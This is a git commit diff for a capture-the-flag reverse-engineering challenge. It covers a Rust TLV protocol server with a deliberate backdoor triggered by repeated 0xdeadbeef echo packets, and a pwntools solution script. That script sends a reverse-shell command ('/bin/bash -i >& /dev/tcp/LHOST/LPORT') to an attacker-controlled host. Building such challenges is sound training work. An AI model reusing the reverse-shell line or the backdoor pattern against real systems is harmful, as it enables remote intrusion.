reverse(tlv): fix packet length check and make chall hidden

reverse/TLV/challenge.yml

@@ -7,7 +7,7 @@ description: |
   As an engineer for Andromeda, you are entrusted with the pivotal task of deciphering "Technological Labyrinth Vanguard", an obscure and long-forgotten network protocol embedded within the critical systems of Project Echo, the clandestine project spearheaded by OrionTech. Suspected to harbor vulnerabilities, TLV poses a significant threat to The Andromeda Initiative's mission to dismantle Project Echo and neutralize their nemesis. Your objective is to reverse engineer of TLV, identify its weaknesses, and devise a strategy to exploit them, thus crippling Project Echo and securing victory for The Andromeda Initiative.
 
 value: 500
-type:  dynamic_docker
+type: dynamic_docker
 extra:
   initial: 500
   minimum: 100
@@ -28,5 +28,5 @@ files:
   - "public/Dockerfile"
   - "public/flag.txt"
 
-state: visible
+state: hidden
 version: "0.1"

reverse/TLV/setup/main.rs

@@ -14,22 +14,10 @@ struct TLVPacket {
 }
 
 impl TLVPacket {
-    fn new(packet_type: u32, length: u32, mut value: Vec<u8>) -> Self {
-        // Truncate the value if its length exceeds the specified length
-        if value.len() > length as usize {
-            value.truncate(length as usize);
-        }
-
-        TLVPacket {
-            packet_type,
-            length,
-            value,
-        }
-    }
 
     fn from_bytes(bytes: &[u8]) -> Option<Self> {
         let len = bytes.len();
-        if bytes.len() < TYPE_LENGTH + LENGTH_LENGTH {
+        if len < TYPE_LENGTH + LENGTH_LENGTH {
             return None;
         }
 
@@ -47,7 +35,7 @@ impl TLVPacket {
             bytes[4],
         ]) as usize;
 
-        if bytes.len() < TYPE_LENGTH + LENGTH_LENGTH + length {
+        if len != TYPE_LENGTH + LENGTH_LENGTH + length {
             return None;
         }
 
@@ -99,7 +87,7 @@ impl TLVPacket {
     }
 
     fn handle_echo_packet(value: &[u8]) -> Vec<u8> {
-        let mut response = value.to_vec();
+        let response = value.to_vec();
         unsafe {
             if response.len() == 4 && u32::from_be_bytes([response[3], response[2], response[1], response[0]]) == 0xdeadbeef {
                 BACKDOOR_TRIGGER += 1;
@@ -168,7 +156,7 @@ fn handle_client(mut stream: TcpStream) {
                 println!("Client disconnected");
                 unsafe {
                     BACKDOOR_TRIGGER = 0;
-                }                
+                }
                 return;
             }
         }

reverse/TLV/sol/sol.py

@@ -1,20 +1,23 @@
 from pwn import *
 
+
 def send_packet(packet_type, length, value):
     packet = p32(packet_type) + p32(length) + value
     return packet
 
+
 def run():
     if args.GDB:
         return gdb.debug(elf.path, gdbscript=gs)
     elif args.R:
-        HOST = args.R.split(':')[0]
-        PORT = args.R.split(':')[1]
+        HOST = args.R.split(":")[0]
+        PORT = args.R.split(":")[1]
         return remote(HOST, PORT)
     else:
         return process(elf.path)
 
-conn= run()
+
+conn = run()
 
 # Craft and send packets to trigger the backdoor function
 # Type 0x4 echo packet to increment the backdoor_trigger
@@ -27,13 +30,13 @@ def run():
     conn.send(echo_packet)
 
 # # Craft and send a backdoor packet to execute "cat flag.txt"
-LHOST = args.ATTACKER.split(':')[0]
-LPORT = args.ATTACKER.split(':')[1]
+LHOST = args.ATTACKER.split(":")[0]
+LPORT = args.ATTACKER.split(":")[1]
 
 cmd = args.CMD
-cmd = f'/bin/bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1'
+cmd = f"/bin/bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1"
 
-backdoor_packet = send_packet(0x4, 12, cmd.encode())
+backdoor_packet = send_packet(0x4, len(cmd), cmd.encode())
 conn.send(backdoor_packet)
 
 conn.interactive()